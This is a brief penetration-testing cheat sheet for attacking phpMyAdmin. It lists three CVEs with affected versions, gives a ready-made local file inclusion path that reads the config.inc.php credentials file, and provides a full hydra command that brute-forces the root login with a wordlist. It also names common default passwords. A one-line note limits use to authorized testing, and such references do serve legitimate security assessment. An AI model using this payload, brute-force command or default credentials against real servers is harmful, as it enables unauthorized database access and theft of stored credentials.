phpMyAdmin Hacktricks Verified

| CVE | Version | Verified Exploit |
|-----|---------|------------------|
| CVE-2016-5734 | 4.0.x – 4.6.2 | RCE via `preg_replace` in table search. Metasploit module available. |
| CVE-2018-12613 | 4.8.0 – 4.8.1 | Local file inclusion (LFI) via `?target=db_sql.php%253f/../../config.inc.php` |
| CVE-2019-12922 | 4.9.0.1 | CSRF + RCE via crafted SQL. |

```bash
hydra -l root -P /usr/share/wordlists/fasttrack.txt target http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:token"
```

This information is for authorized security testing only. Always follow responsible disclosure.

Many installations still use `root` with a blank password or `admin` / `password`.